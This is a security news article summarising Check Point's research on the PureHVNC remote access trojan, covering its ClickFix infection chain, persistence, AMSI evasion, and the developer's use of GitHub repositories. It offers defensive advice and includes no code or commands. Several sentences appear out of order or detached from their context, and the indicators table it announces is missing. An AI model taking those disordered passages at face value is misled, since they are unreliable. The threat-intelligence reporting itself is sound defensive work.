PureHVNC RAT Developers Exploit GitHub to Spread Pure Malware Source Code

The developers behind the PureHVNC remote access trojan (RAT) have been uncovered using GitHub repositories to host critical components and plugin source code for their Pure malware family.

Check Point Research’s recent forensic analysis of an eight-day ClickFix intrusion campaign reveals that PureHVNC’s command-and-control (C&C) server delivered GitHub URLs to infected machines, a practice previously unseen in high-confidence attribution for this threat actor.

By mapping these repositories to accounts operated by the malware author known as PureCoder, investigators have gained rare insights into the malware ecosystem, developer practices, and potential geographic footprint of this sophisticated operation.

During a mid-2025 incident response engagement, Check Point’s team traced a phishing campaign employing the ClickFix social engineering technique, wherein victims were fooled into executing a PowerShell payload by visiting a fake job listing.

This initial loader, written in Rust, installed PureHVNC RAT with campaign identifiers “2a” and “amazon3.”

During the eight-day intrusion, the attacker used malicious JavaScript files, deployed two instances of PureHVNC RAT, established persistence on the victim’s system, and finally executed the Sliver Command and Control (C2) framework.

The RAT maintained persistence via scheduled tasks and used SSL-secured communications to exfiltrate system information—including installed antivirus products, user privileges, OS details, and idle time—in compressed, chunked payloads of up to 16 KB.

Investigators extracted PureHVNC’s full command set, configuration schema, and plugin mechanism, noting the malware’s use of registry-stored, compressed plugin data that is dynamically reversed and decompressed at runtime.

Analysis of this builder revealed enums for PureCrypter integration, demonstrating how customers could select encryption options, persistence methods, and code injection techniques.

This integrated toolkit underscores the modular design philosophy of the Pure malware suite, enabling threat actors to tailor deployments for diverse objectives.

GitHub Hosting Reveals Developer Link

A pivotal finding emerged when the RAT contacted its C&C and downloaded three distinct GitHub URLs. Initial assumptions posited that these accounts belonged to customers distributing additional payloads.

By doing so, the malware disables AMSI’s runtime scanning capabilities, thereby evading detection and analysis by security products that rely on AMSI for real-time malware inspection.

However, reverse engineering of the PureRAT administration-builder uncovered that these hardcoded URLs are an intrinsic part of the builder itself.

This discovery directly links the GitHub accounts—one named testdemo345 and another labeled DFfe9ewf/PURE-CODER-1—to PureCoder, rather than to intermediary operators or crimeware customers.

The repositories house executable modules and plugin source files for TwitchBot and YoutubeBot extensions, which enable followers, likes, and ad-click operations on streaming platforms.

Metadata from Git commits indicates timestamps corresponding to UTC+0300, suggesting that PureCoder operates within this timezone, potentially placing them in Eastern Europe or Western Asia.

As the last step, the Rust Loader creates a heap, copies the decrypted payload buffer into it, and executes the shellcode.

Although exact attribution remains challenging, these indicators equip law enforcement and threat intelligence teams with actionable leads for further investigation.

Implications and Future Outlook

The revelation that PureHVNC and related malware components are hosted in plain sight on a mainstream development platform challenges conventional threat actor tradecraft.

Check Point further identified a PureRAT builder and administration console supporting multiple languages (English, Russian, and Chinese).

Hosting modules on GitHub offers high availability and redundancy, simplifies version control for developers, and evades basic network filtering by leveraging legitimate HTTPS traffic.

However, this practice also introduces a traceable footprint; investigators can monitor repository creation, commit patterns, and account activity to anticipate future updates or identify associated projects.

Organizations should prioritize monitoring network logs for anomalous GitHub API calls and unusual repository clones originating from endpoints.

Endpoint detection tools should flag scheduled tasks referencing GitHub downloads, especially when combined with encrypted SSL streams to non-standard ports.

Proactive threat hunting exercises focusing on emerging PureCrypter and PureLogs variants may uncover early indicators of compromise in environments targeted by PureRAT campaigns.

As the Pure malware family evolves, its developers are likely to diversify hosting solutions—potentially migrating to alternative code-sharing platforms or embedding payloads directly within the builder interface.

Security teams must therefore adopt adaptive detection strategies that blend signature-based controls with behavior-based analytics.

By understanding the developer’s operational practices and infrastructure preferences, defenders can gain strategic advantage over this adaptable and increasingly prevalent threat actor.

Indicators of Compromise

Here is the information in table format:

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.